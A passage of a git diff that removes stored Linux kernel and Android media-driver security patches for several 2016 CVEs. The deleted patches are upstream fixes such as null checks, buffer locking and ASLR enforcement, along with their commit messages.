-+			dev_err(dev, "bulk-out endpoint missing\n");
-+			return -ENODEV;
-+		}
-+	}
- 
- 	serial_priv = kzalloc(sizeof(*serial_priv), GFP_KERNEL);
- 	if (!serial_priv)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3156/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3156/ANY/0001.patch
deleted file mode 100644
index 176b4f71..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3156/ANY/0001.patch
+++ /dev/null
@@ -1,97 +0,0 @@
-From fbd40ea0180a2d328c5adc61414dc8bab9335ce2 Mon Sep 17 00:00:00 2001
-From: "David S. Miller" <davem@davemloft.net>
-Date: Sun, 13 Mar 2016 23:28:00 -0400
-Subject: ipv4: Don't do expensive useless work during inetdev destroy.
-
-When an inetdev is destroyed, every address assigned to the interface
-is removed.  And in this scenerio we do two pointless things which can
-be very expensive if the number of assigned interfaces is large:
-
-1) Address promotion.  We are deleting all addresses, so there is no
-   point in doing this.
-
-2) A full nf conntrack table purge for every address.  We only need to
-   do this once, as is already caught by the existing
-   masq_dev_notifier so masq_inet_event() can skip this.
-
-Reported-by: Solar Designer <solar@openwall.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
-Tested-by: Cyrill Gorcunov <gorcunov@openvz.org>
----
- net/ipv4/devinet.c                          |  4 ++++
- net/ipv4/fib_frontend.c                     |  4 ++++
- net/ipv4/netfilter/nf_nat_masquerade_ipv4.c | 12 ++++++++++--
- 3 files changed, 18 insertions(+), 2 deletions(-)
-
-diff --git a/net/ipv4/devinet.c b/net/ipv4/devinet.c
-index 65e76a4..e333bc8 100644
---- a/net/ipv4/devinet.c
-+++ b/net/ipv4/devinet.c
-@@ -334,6 +334,9 @@ static void __inet_del_ifa(struct in_device *in_dev, struct in_ifaddr **ifap,
- 
- 	ASSERT_RTNL();
- 
-+	if (in_dev->dead)
-+		goto no_promotions;
-+
- 	/* 1. Deleting primary ifaddr forces deletion all secondaries
- 	 * unless alias promotion is set
- 	 **/
-@@ -380,6 +383,7 @@ static void __inet_del_ifa(struct in_device *in_dev, struct in_ifaddr **ifap,
- 			fib_del_ifaddr(ifa, ifa1);
- 	}
- 
-+no_promotions:
- 	/* 2. Unlink it */
- 
- 	*ifap = ifa1->ifa_next;
-diff --git a/net/ipv4/fib_frontend.c b/net/ipv4/fib_frontend.c
-index 4734475..21add55 100644
---- a/net/ipv4/fib_frontend.c
-+++ b/net/ipv4/fib_frontend.c
-@@ -922,6 +922,9 @@ void fib_del_ifaddr(struct in_ifaddr *ifa, struct in_ifaddr *iprim)
- 		subnet = 1;
- 	}
- 
-+	if (in_dev->dead)
-+		goto no_promotions;
-+
- 	/* Deletion is more complicated than add.
- 	 * We should take care of not to delete too much :-)
- 	 *
-@@ -997,6 +1000,7 @@ void fib_del_ifaddr(struct in_ifaddr *ifa, struct in_ifaddr *iprim)
- 		}
- 	}
- 
-+no_promotions:
- 	if (!(ok & BRD_OK))
- 		fib_magic(RTM_DELROUTE, RTN_BROADCAST, ifa->ifa_broadcast, 32, prim);
- 	if (subnet && ifa->ifa_prefixlen < 31) {
-diff --git a/net/ipv4/netfilter/nf_nat_masquerade_ipv4.c b/net/ipv4/netfilter/nf_nat_masquerade_ipv4.c
-index c6eb421..ea91058 100644
---- a/net/ipv4/netfilter/nf_nat_masquerade_ipv4.c
-+++ b/net/ipv4/netfilter/nf_nat_masquerade_ipv4.c
-@@ -108,10 +108,18 @@ static int masq_inet_event(struct notifier_block *this,
- 			   unsigned long event,
- 			   void *ptr)
- {
--	struct net_device *dev = ((struct in_ifaddr *)ptr)->ifa_dev->dev;
-+	struct in_device *idev = ((struct in_ifaddr *)ptr)->ifa_dev;
- 	struct netdev_notifier_info info;
- 
--	netdev_notifier_info_init(&info, dev);
-+	/* The masq_dev_notifier will catch the case of the device going
-+	 * down.  So if the inetdev is dead and being destroyed we have
-+	 * no work to do.  Otherwise this is an individual address removal
-+	 * and we have to perform the flush.
-+	 */
-+	if (idev->dead)
-+		return NOTIFY_DONE;
-+
-+	netdev_notifier_info_init(&info, idev->dev);
- 	return masq_device_event(this, event, &info);
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3672/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3672/ANY/0001.patch
deleted file mode 100644
index de810f0b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3672/ANY/0001.patch
+++ /dev/null
@@ -1,83 +0,0 @@
-From 8b8addf891de8a00e4d39fc32f93f7c5eb8feceb Mon Sep 17 00:00:00 2001
-From: Hector Marco-Gisbert <hecmargi@upv.es>
-Date: Thu, 10 Mar 2016 20:51:00 +0100
-Subject: x86/mm/32: Enable full randomization on i386 and X86_32
-
-Currently on i386 and on X86_64 when emulating X86_32 in legacy mode, only
-the stack and the executable are randomized but not other mmapped files
-(libraries, vDSO, etc.). This patch enables randomization for the
-libraries, vDSO and mmap requests on i386 and in X86_32 in legacy mode.
-
-By default on i386 there are 8 bits for the randomization of the libraries,
-vDSO and mmaps which only uses 1MB of VA.
-
-This patch preserves the original randomness, using 1MB of VA out of 3GB or
-4GB. We think that 1MB out of 3GB is not a big cost for having the ASLR.
-
-The first obvious security benefit is that all objects are randomized (not
-only the stack and the executable) in legacy mode which highly increases
-the ASLR effectiveness, otherwise the attackers may use these
-non-randomized areas. But also sensitive setuid/setgid applications are
-more secure because currently, attackers can disable the randomization of
-these applications by setting the ulimit stack to "unlimited". This is a
-very old and widely known trick to disable the ASLR in i386 which has been
-allowed for too long.
-
-Another trick used to disable the ASLR was to set the ADDR_NO_RANDOMIZE
-personality flag, but fortunately this doesn't work on setuid/setgid
-applications because there is security checks which clear Security-relevant
-flags.
-
-This patch always randomizes the mmap_legacy_base address, removing the
-possibility to disable the ASLR by setting the stack to "unlimited".
-
-Signed-off-by: Hector Marco-Gisbert <hecmargi@upv.es>
-Acked-by: Ismael Ripoll Ripoll <iripoll@upv.es>
-Acked-by: Kees Cook <keescook@chromium.org>
-Acked-by: Arjan van de Ven <arjan@linux.intel.com>
-Cc: Linus Torvalds <torvalds@linux-foundation.org>
-Cc: Peter Zijlstra <peterz@infradead.org>
-Cc: Thomas Gleixner <tglx@linutronix.de>
-Cc: akpm@linux-foundation.org
-Cc: kees Cook <keescook@chromium.org>
-Link: http://lkml.kernel.org/r/1457639460-5242-1-git-send-email-hecmargi@upv.es
-Signed-off-by: Ingo Molnar <mingo@kernel.org>
----
- arch/x86/mm/mmap.c | 14 +-------------
- 1 file changed, 1 insertion(+), 13 deletions(-)
-
-diff --git a/arch/x86/mm/mmap.c b/arch/x86/mm/mmap.c
-index 96bd1e2..389939f 100644
---- a/arch/x86/mm/mmap.c
-+++ b/arch/x86/mm/mmap.c
-@@ -94,18 +94,6 @@ static unsigned long mmap_base(unsigned long rnd)
- }
- 
- /*
-- * Bottom-up (legacy) layout on X86_32 did not support randomization, X86_64
-- * does, but not when emulating X86_32
-- */
--static unsigned long mmap_legacy_base(unsigned long rnd)
--{
--	if (mmap_is_ia32())
--		return TASK_UNMAPPED_BASE;
--	else
--		return TASK_UNMAPPED_BASE + rnd;
--}
--
--/*
-  * This function, called very early during the creation of a new
-  * process VM image, sets up which VM layout function to use:
-  */
-@@ -116,7 +104,7 @@ void arch_pick_mmap_layout(struct mm_struct *mm)
- 	if (current->flags & PF_RANDOMIZE)
- 		random_factor = arch_mmap_rnd();
- 
--	mm->mmap_legacy_base = mmap_legacy_base(random_factor);
-+	mm->mmap_legacy_base = TASK_UNMAPPED_BASE + random_factor;
- 
- 	if (mmap_is_legacy()) {
- 		mm->mmap_base = mm->mmap_legacy_base;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3689/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3689/ANY/0001.patch
deleted file mode 100644
index 5c5c1bce..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3689/ANY/0001.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From a0ad220c96692eda76b2e3fd7279f3dcd1d8a8ff Mon Sep 17 00:00:00 2001
-From: Oliver Neukum <oneukum@suse.com>
-Date: Thu, 17 Mar 2016 14:00:17 -0700
-Subject: Input: ims-pcu - sanity check against missing interfaces
-
-A malicious device missing interface can make the driver oops.
-Add sanity checking.
-
-Signed-off-by: Oliver Neukum <ONeukum@suse.com>
-CC: stable@vger.kernel.org
-Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
----
- drivers/input/misc/ims-pcu.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/drivers/input/misc/ims-pcu.c b/drivers/input/misc/ims-pcu.c
-index ac1fa5f..9c0ea36 100644
---- a/drivers/input/misc/ims-pcu.c
-+++ b/drivers/input/misc/ims-pcu.c
-@@ -1663,6 +1663,8 @@ static int ims_pcu_parse_cdc_data(struct usb_interface *intf, struct ims_pcu *pc
- 
- 	pcu->ctrl_intf = usb_ifnum_to_if(pcu->udev,
- 					 union_desc->bMasterInterface0);
-+	if (!pcu->ctrl_intf)
-+		return -EINVAL;
- 
- 	alt = pcu->ctrl_intf->cur_altsetting;
- 	pcu->ep_ctrl = &alt->endpoint[0].desc;
-@@ -1670,6 +1672,8 @@ static int ims_pcu_parse_cdc_data(struct usb_interface *intf, struct ims_pcu *pc
- 
- 	pcu->data_intf = usb_ifnum_to_if(pcu->udev,
- 					 union_desc->bSlaveInterface0);
-+	if (!pcu->data_intf)
-+		return -EINVAL;
- 
- 	alt = pcu->data_intf->cur_altsetting;
- 	if (alt->desc.bNumEndpoints != 2) {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3746/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3746/ANY/0001.patch
deleted file mode 100644
index 1bf7d443..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3746/ANY/0001.patch
+++ /dev/null
@@ -1,162 +0,0 @@
-From c2e66c4ee83b4264d691d8aaabb2e94744df1e25 Mon Sep 17 00:00:00 2001
-From: Praveen Chavan <pchavan@codeaurora.org>
-Date: Mon, 25 Apr 2016 10:03:42 -0700
-Subject: mm-video-v4l2: vdec: Avoid processing ETBs/FTBs in invalid states
-
-(per the spec) ETB/FTB should not be handled in states other than
-Executing, Paused and Idle. This avoids accessing invalid buffers.
-Also add a lock to protect the private-buffers from being deleted
-while accessing from another thread.
-
-Bug: 27890802
-Security Vulnerability - Heap Use-After-Free and Possible LPE in
-MediaServer (libOmxVdec problem #6)
-
-CRs-Fixed: 1008882
-
-Change-Id: Iaac2e383cd53cf9cf8042c9ed93ddc76dba3907e
----
- mm-video-v4l2/vidc/common/inc/vidc_debug.h       | 14 +++++++++++
- mm-video-v4l2/vidc/vdec/inc/omx_vdec.h           |  1 +
- mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp | 32 +++++++++++++++++-------
- 3 files changed, 38 insertions(+), 9 deletions(-)
-
-diff --git a/mm-video-v4l2/vidc/common/inc/vidc_debug.h b/mm-video-v4l2/vidc/common/inc/vidc_debug.h
-index 0ce747c..d9007f2 100644
---- a/mm-video-v4l2/vidc/common/inc/vidc_debug.h
-+++ b/mm-video-v4l2/vidc/common/inc/vidc_debug.h
-@@ -31,6 +31,7 @@ ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
- 
- #ifdef _ANDROID_
- #include <cstdio>
-+#include <pthread.h>
- 
- enum {
-    PRIO_ERROR=0x1,
-@@ -75,4 +76,17 @@ extern int debug_level;
-         }                                                                      \
-     }                                                                          \
- 
-+class auto_lock {
-+    public:
-+        auto_lock(pthread_mutex_t &lock)
-+            : mLock(lock) {
-+                pthread_mutex_lock(&mLock);
-+            }
-+        ~auto_lock() {
-+            pthread_mutex_unlock(&mLock);
-+        }
-+    private:
-+        pthread_mutex_t &mLock;
-+};
-+
- #endif
-diff --git a/mm-video-v4l2/vidc/vdec/inc/omx_vdec.h b/mm-video-v4l2/vidc/vdec/inc/omx_vdec.h
-index 2df1b6e..616b8c2 100644
---- a/mm-video-v4l2/vidc/vdec/inc/omx_vdec.h
-+++ b/mm-video-v4l2/vidc/vdec/inc/omx_vdec.h
-@@ -772,6 +772,7 @@ class omx_vdec: public qc_omx_component
-         //*************************************************************
-         pthread_mutex_t       m_lock;
-         pthread_mutex_t       c_lock;
-+        pthread_mutex_t       buf_lock;
-         //sem to handle the minimum procesing of commands
-         sem_t                 m_cmd_lock;
-         sem_t                 m_safe_flush;
-diff --git a/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp b/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp
-index 646f211..f490fad 100644
---- a/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp
-+++ b/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp
-@@ -685,6 +685,7 @@ omx_vdec::omx_vdec(): m_error_propogated(false),
-     m_vendor_config.pData = NULL;
-     pthread_mutex_init(&m_lock, NULL);
-     pthread_mutex_init(&c_lock, NULL);
-+    pthread_mutex_init(&buf_lock, NULL);
-     sem_init(&m_cmd_lock,0,0);
-     sem_init(&m_safe_flush, 0, 0);
-     streaming[CAPTURE_PORT] =
-@@ -812,6 +813,7 @@ omx_vdec::~omx_vdec()
-     close(drv_ctx.video_driver_fd);
-     pthread_mutex_destroy(&m_lock);
-     pthread_mutex_destroy(&c_lock);
-+    pthread_mutex_destroy(&buf_lock);
-     sem_destroy(&m_cmd_lock);
-     if (perf_flag) {
-         DEBUG_PRINT_HIGH("--> TOTAL PROCESSING TIME");
-@@ -5041,6 +5043,9 @@ OMX_ERRORTYPE omx_vdec::free_input_buffer(OMX_BUFFERHEADERTYPE *bufferHdr)
-     index = bufferHdr - m_inp_mem_ptr;
-     DEBUG_PRINT_LOW("Free Input Buffer index = %d",index);
- 
-+    auto_lock l(buf_lock);
-+    bufferHdr->pInputPortPrivate = NULL;
-+
-     if (index < drv_ctx.ip_buf.actualcount && drv_ctx.ptr_inputbuffer) {
-         DEBUG_PRINT_LOW("Free Input Buffer index = %d",index);
-         if (drv_ctx.ptr_inputbuffer[index].pmem_fd > 0) {
-@@ -5985,7 +5990,9 @@ OMX_ERRORTYPE  omx_vdec::empty_this_buffer(OMX_IN OMX_HANDLETYPE         hComp,
-     OMX_ERRORTYPE ret1 = OMX_ErrorNone;
-     unsigned int nBufferIndex = drv_ctx.ip_buf.actualcount;
- 
--    if (m_state == OMX_StateInvalid) {
-+    if (m_state != OMX_StateExecuting &&
-+            m_state != OMX_StatePause &&
-+            m_state != OMX_StateIdle) {
-         DEBUG_PRINT_ERROR("Empty this buffer in Invalid State");
-         return OMX_ErrorInvalidState;
-     }
-@@ -6136,9 +6143,10 @@ OMX_ERRORTYPE  omx_vdec::empty_this_buffer_proxy(OMX_IN OMX_HANDLETYPE  hComp,
-         return OMX_ErrorNone;
-     }
- 
-+    auto_lock l(buf_lock);
-     temp_buffer = (struct vdec_bufferpayload *)buffer->pInputPortPrivate;
- 
--    if ((temp_buffer -  drv_ctx.ptr_inputbuffer) > (int)drv_ctx.ip_buf.actualcount) {
-+    if (!temp_buffer || (temp_buffer -  drv_ctx.ptr_inputbuffer) > (int)drv_ctx.ip_buf.actualcount) {
-         return OMX_ErrorBadParameter;
-     }
-     /* If its first frame, H264 codec and reject is true, then parse the nal
-@@ -6164,7 +6172,7 @@ OMX_ERRORTYPE  omx_vdec::empty_this_buffer_proxy(OMX_IN OMX_HANDLETYPE  hComp,
-     /*for use buffer we need to memcpy the data*/
-     temp_buffer->buffer_len = buffer->nFilledLen;
- 
--    if (input_use_buffer) {
-+    if (input_use_buffer && temp_buffer->bufferaddr) {
-         if (buffer->nFilledLen <= temp_buffer->buffer_len) {
-             if (arbitrary_bytes) {
-                 memcpy (temp_buffer->bufferaddr, (buffer->pBuffer + buffer->nOffset),buffer->nFilledLen);
-@@ -6340,6 +6348,18 @@ if (buffer->nFlags & QOMX_VIDEO_BUFFERFLAG_EOSEQ) {
- OMX_ERRORTYPE  omx_vdec::fill_this_buffer(OMX_IN OMX_HANDLETYPE  hComp,
-         OMX_IN OMX_BUFFERHEADERTYPE* buffer)
- {
-+    if (m_state != OMX_StateExecuting &&
-+            m_state != OMX_StatePause &&
-+            m_state != OMX_StateIdle) {
-+        DEBUG_PRINT_ERROR("FTB in Invalid State");
-+        return OMX_ErrorInvalidState;
-+    }
-+
-+    if (!m_out_bEnabled) {
-+        DEBUG_PRINT_ERROR("ERROR:FTB incorrect state operation, output port is disabled.");
-+        return OMX_ErrorIncorrectStateOperation;
-+    }
-+
-     unsigned nPortIndex = 0;
-     if (dynamic_buf_mode) {
-         private_handle_t *handle = NULL;
-@@ -6376,12 +6396,6 @@ OMX_ERRORTYPE  omx_vdec::fill_this_buffer(OMX_IN OMX_HANDLETYPE  hComp,
-         buffer->nAllocLen = handle->size;
-     }
- 
--
--    if (m_state == OMX_StateInvalid) {
--        DEBUG_PRINT_ERROR("FTB in Invalid State");
--        return OMX_ErrorInvalidState;
--    }
--
-     if (!m_out_bEnabled) {
-         DEBUG_PRINT_ERROR("ERROR:FTB incorrect state operation, output port is disabled.");
-         return OMX_ErrorIncorrectStateOperation;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3747/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3747/ANY/0001.patch
deleted file mode 100644
index 8b429546..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3747/ANY/0001.patch
+++ /dev/null
@@ -1,91 +0,0 @@
-From 905826825e4459c0dfc9d6475e950d6be3a16fc7 Mon Sep 17 00:00:00 2001
-From: Praveen Chavan <pchavan@codeaurora.org>
-Date: Mon, 25 Apr 2016 11:51:05 -0700
-Subject: mm-video-v4l2: venc: Avoid processing ETBs/FTBs in invalid states
-
-(per the spec) ETB/FTB should not be handled in states other than
-Executing, Paused and Idle. This avoids accessing invalid buffers.
-Also add a lock to protect the private-buffers from being deleted
-while accessing from another thread.
-
-Bug: 27903498
-Security Vulnerability - Heap Use-After-Free and Possible LPE in
-MediaServer (libOmxVenc problem #3)
-
-CRs-Fixed: 1010088
-
-Change-Id: I898b42034c0add621d4f9d8e02ca0ed4403d4fd3
----
- mm-video-v4l2/vidc/venc/src/omx_video_base.cpp | 20 ++++++++++++++++----
- 1 file changed, 16 insertions(+), 4 deletions(-)
-
-diff --git a/mm-video-v4l2/vidc/venc/src/omx_video_base.cpp b/mm-video-v4l2/vidc/venc/src/omx_video_base.cpp
-index a481872..df30748 100644
---- a/mm-video-v4l2/vidc/venc/src/omx_video_base.cpp
-+++ b/mm-video-v4l2/vidc/venc/src/omx_video_base.cpp
-@@ -2561,6 +2561,8 @@ OMX_ERRORTYPE omx_video::free_input_buffer(OMX_BUFFERHEADERTYPE *bufferHdr)
-     }
- 
-     if (index < m_sInPortDef.nBufferCountActual && m_pInput_pmem) {
-+        auto_lock l(m_lock);
-+
-         if (m_pInput_pmem[index].fd > 0 && input_use_buffer == false) {
-             DEBUG_PRINT_LOW("FreeBuffer:: i/p AllocateBuffer case");
-             if(!secure_session) {
-@@ -2568,6 +2570,7 @@ OMX_ERRORTYPE omx_video::free_input_buffer(OMX_BUFFERHEADERTYPE *bufferHdr)
-             } else {
-                 free(m_pInput_pmem[index].buffer);
-             }
-+            m_pInput_pmem[index].buffer = NULL;
-             close (m_pInput_pmem[index].fd);
- #ifdef USE_ION
-             free_ion_memory(&m_pInput_ion[index]);
-@@ -2581,6 +2584,7 @@ OMX_ERRORTYPE omx_video::free_input_buffer(OMX_BUFFERHEADERTYPE *bufferHdr)
-             }
-             if(!secure_session) {
-                 munmap (m_pInput_pmem[index].buffer,m_pInput_pmem[index].size);
-+                m_pInput_pmem[index].buffer = NULL;
-             }
-             close (m_pInput_pmem[index].fd);
- #ifdef USE_ION
-@@ -3296,7 +3300,9 @@ OMX_ERRORTYPE  omx_video::empty_this_buffer(OMX_IN OMX_HANDLETYPE         hComp,
-     unsigned int nBufferIndex ;
- 
-     DEBUG_PRINT_LOW("ETB: buffer = %p, buffer->pBuffer[%p]", buffer, buffer->pBuffer);
--    if (m_state == OMX_StateInvalid) {
-+    if (m_state != OMX_StateExecuting &&
-+            m_state != OMX_StatePause &&
-+            m_state != OMX_StateIdle) {
-         DEBUG_PRINT_ERROR("ERROR: Empty this buffer in Invalid State");
-         return OMX_ErrorInvalidState;
-     }
-@@ -3459,9 +3465,13 @@ OMX_ERRORTYPE  omx_video::empty_this_buffer_proxy(OMX_IN OMX_HANDLETYPE  hComp,
- #endif
-     {
-         DEBUG_PRINT_LOW("Heap UseBuffer case, so memcpy the data");
-+
-+        auto_lock l(m_lock);
-         pmem_data_buf = (OMX_U8 *)m_pInput_pmem[nBufIndex].buffer;
--        memcpy (pmem_data_buf, (buffer->pBuffer + buffer->nOffset),
--                buffer->nFilledLen);
-+        if (pmem_data_buf) {
-+            memcpy (pmem_data_buf, (buffer->pBuffer + buffer->nOffset),
-+                    buffer->nFilledLen);
-+        }
-         DEBUG_PRINT_LOW("memcpy() done in ETBProxy for i/p Heap UseBuf");
-     } else if (mUseProxyColorFormat) {
-         // Gralloc-source buffers with color-conversion
-@@ -3520,7 +3530,9 @@ OMX_ERRORTYPE  omx_video::fill_this_buffer(OMX_IN OMX_HANDLETYPE  hComp,
-         OMX_IN OMX_BUFFERHEADERTYPE* buffer)
- {
-     DEBUG_PRINT_LOW("FTB: buffer->pBuffer[%p]", buffer->pBuffer);
--    if (m_state == OMX_StateInvalid) {
-+    if (m_state != OMX_StateExecuting &&
-+            m_state != OMX_StatePause &&
-+            m_state != OMX_StateIdle) {
-         DEBUG_PRINT_ERROR("ERROR: FTB in Invalid State");
-         return OMX_ErrorInvalidState;
-     }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3768/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3768/ANY/0001.patch
deleted file mode 100644
index 5e0db56f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3768/ANY/0001.patch
+++ /dev/null
@@ -1,90 +0,0 @@
-From d75be03af111fb5a31eba82f665242e6d8b07008 Mon Sep 17 00:00:00 2001
-From: Arun KS <arunks@codeaurora.org>
-Date: Wed, 11 May 2016 10:11:36 +0530
-Subject: msm: perf: Do not allocate new hw_event if event is duplicate.
-
-During a perf_event_enable, kernel/events/core.c calls pmu->add() which
-is platform implementation(arch/arm/kernel/perf_event.c). Due to the
-duplicate constraints, arch/arm/mach-msm/perf_event_msm_krait_l2.c
-drivers marks the event as OFF but returns TRUE to perf_event.c which
-goes ahead and allocates the hw_event and enables it.
-
-Since event is marked OFF, kernel events core will try to enable this event
-again during next perf_event_enable. Which results in same event enabled
-on multiple hw_events. But during the perf_release, event struct is freed
-and only one hw_event is released. This results in dereferencing the
-invalid pointer and hence the crash.
-
-Fix this by returning error in case of constraint event duplicate. Hence
-avoiding the same event programmed on multiple hw event counters.
-
-Change-Id: Ia3360be027dfe87ac753191ffe7e0bc947e72455
-Signed-off-by: Arun KS <arunks@codeaurora.org>
----
- arch/arm/kernel/perf_event.c                | 1 +
- arch/arm/mach-msm/perf_event_msm_krait_l2.c | 1 +
- arch/arm/mach-msm/perf_event_msm_l2.c       | 4 +++-
- kernel/events/core.c                        | 7 -------
- 4 files changed, 5 insertions(+), 8 deletions(-)
-
-diff --git a/arch/arm/kernel/perf_event.c b/arch/arm/kernel/perf_event.c
-index 1541a80..a1264ac 100644
---- a/arch/arm/kernel/perf_event.c
-+++ b/arch/arm/kernel/perf_event.c
-@@ -308,6 +308,7 @@ armpmu_add(struct perf_event *event, int flags)
- 			pr_err("Event: %llx failed constraint check.\n",
- 					event->attr.config);
- 			event->state = PERF_EVENT_STATE_OFF;
-+			err = -EPERM;
- 			goto out;
- 		}
- 
-diff --git a/arch/arm/mach-msm/perf_event_msm_krait_l2.c b/arch/arm/mach-msm/perf_event_msm_krait_l2.c
-index d816794..57f82d0 100644
---- a/arch/arm/mach-msm/perf_event_msm_krait_l2.c
-+++ b/arch/arm/mach-msm/perf_event_msm_krait_l2.c
-@@ -463,6 +463,7 @@ static int msm_l2_test_set_ev_constraint(struct perf_event *event)
- 			if (!(event->cpu < 0)) {
- 				event->state = PERF_EVENT_STATE_OFF;
- 				event->attr.constraint_duplicate = 1;
-+				err = -EPERM;
- 			}
- 	}
- out:
-diff --git a/arch/arm/mach-msm/perf_event_msm_l2.c b/arch/arm/mach-msm/perf_event_msm_l2.c
-index f78487a..93695e2 100644
---- a/arch/arm/mach-msm/perf_event_msm_l2.c
-+++ b/arch/arm/mach-msm/perf_event_msm_l2.c
-@@ -836,8 +836,10 @@ static int msm_l2_test_set_ev_constraint(struct perf_event *event)
- 			 * This sets the event OFF on all but one
- 			 * CPU.
- 			 */
--			if (!(event->cpu < 0))
-+			if (!(event->cpu < 0)) {
- 				event->state = PERF_EVENT_STATE_OFF;
-+				err = -EPERM;
-+			}
- 	}
- 
- out:
-diff --git a/kernel/events/core.c b/kernel/events/core.c
-index 33ad70a..7ebe09a 100644
---- a/kernel/events/core.c
-+++ b/kernel/events/core.c
-@@ -3030,13 +3030,6 @@ static void put_event(struct perf_event *event)
- 
- 	if (!atomic_long_dec_and_test(&event->refcount))
- 		return;
--	/*
--	 * Event can be in state OFF because of a constraint check.
--	 * Change to ACTIVE so that it gets cleaned up correctly.
--	 */
--	if ((event->state == PERF_EVENT_STATE_OFF) &&
--	    event->attr.constraint_duplicate)
--		event->state = PERF_EVENT_STATE_ACTIVE;
- 
- 	rcu_read_lock();
- 	owner = ACCESS_ONCE(event->owner);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3768/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-3768/ANY/0002.patch
deleted file mode 100644
index 10ad536a..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3768/ANY/0002.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-From 84d8c81420aaa7c6cd6f57cb52daccf07b1f7a50 Mon Sep 17 00:00:00 2001
-From: Veena Sambasivan <veenas@codeaurora.org>
-Date: Thu, 19 May 2016 18:47:15 -0700
-Subject: [PATCH] msm: perf: Do not allocate new hw_event if event is
- duplicate.
-
-During a perf_event_enable, kernel/events/core.c calls pmu->add() which
-is platform implementation(arch/arm/kernel/perf_event.c). Due to the
-duplicate constraints, arch/arm/mach-msm/perf_event_msm_krait_l2.c
-drivers marks the event as OFF but returns TRUE to perf_event.c which
-goes ahead and allocates the hw_event and enables it.
-Since event is marked OFF, kernel events core will try to enable this event
-again during next perf_event_enable. Which results in same event enabled
-on multiple hw_events. But during the perf_release, event struct is freed
-and only one hw_event is released. This results in dereferencing the
-invalid pointer and hence the crash.
-Fix this by returning error in case of constraint event duplicate. Hence
-avoiding the same event programmed on multiple hw event counters.
-
-bug: 28172137
-Change-Id: Ia3360be027dfe87ac753191ffe7e0bc947e72455
-Signed-off-by: Arun KS <arunks@codeaurora.org>
-Signed-off-by: Veena Sambasivan <veenas@codeaurora.org>
----
- arch/arm/kernel/perf_event.c                | 1 +
- arch/arm/mach-msm/perf_event_msm_krait_l2.c | 1 +
- 2 files changed, 2 insertions(+)
-
-diff --git a/arch/arm/kernel/perf_event.c b/arch/arm/kernel/perf_event.c
-index 0f288a7c035f9..a0c1e318a7905 100644
---- a/arch/arm/kernel/perf_event.c
-+++ b/arch/arm/kernel/perf_event.c
-@@ -240,6 +240,7 @@ armpmu_add(struct perf_event *event, int flags)
- 			pr_err("Event: %llx failed constraint check.\n",
- 					event->attr.config);
- 			event->state = PERF_EVENT_STATE_OFF;
-+			err = -EPERM;
- 			goto out;
- 		}
- 
-diff --git a/arch/arm/mach-msm/perf_event_msm_krait_l2.c b/arch/arm/mach-msm/perf_event_msm_krait_l2.c
-index 65a5d2f8e1bcd..cc39b719b33fb 100644
---- a/arch/arm/mach-msm/perf_event_msm_krait_l2.c
-+++ b/arch/arm/mach-msm/perf_event_msm_krait_l2.c
-@@ -468,6 +468,7 @@ static int msm_l2_test_set_ev_constraint(struct perf_event *event)
- 			if (!(event->cpu < 0)) {
- 				event->state = PERF_EVENT_STATE_OFF;
- 				event->attr.constraint_duplicate = 1;
-+				err = -EPERM;
- 			}
- 	}
- out:
diff --git a/Patches/Linux_CVEs/CVE-2016-3775/3.10/0003.patch b/Patches/Linux_CVEs/CVE-2016-3775/3.10/0003.patch
deleted file mode 100644
index e72588b7..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3775/3.10/0003.patch
+++ /dev/null
@@ -1,53 +0,0 @@
-From 8096090858689395a75bbf696ff8276c3c236b98 Mon Sep 17 00:00:00 2001
-From: Greg Kroah-Hartman <gregkh@google.com>
-Date: Thu, 25 Feb 2016 12:15:48 -0800
-Subject: [PATCH] AIO: properly check iovec sizes
-
-commit ff19ac8fb71e8a2bf07d61b959062998139c1104 upstream
-
-In Linus's tree, the iovec code has been reworked massively, but in
-older kernels the AIO layer should be checking this before passing the
-request on to other layers.
-
-Many thanks to Ben Hawkes of Google Project Zero for pointing out the
-issue.
-
-Bug: 28588279
-
-Reported-by: Ben Hawkes <hawkes@google.com>
-Acked-by: Benjamin LaHaise <bcrl@kvack.org>
-Tested-by: Willy Tarreau <w@1wt.eu>
-[backported to 3.10 - willy]
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-Signed-off-by: Greg Kroah-Hartman <gregkh@google.com>
-
-Change-Id: If539a08b42dd51a473b3f3743f9497e637266a05
----
- fs/aio.c | 11 ++++++++---
- 1 file changed, 8 insertions(+), 3 deletions(-)
-
-diff --git a/fs/aio.c b/fs/aio.c
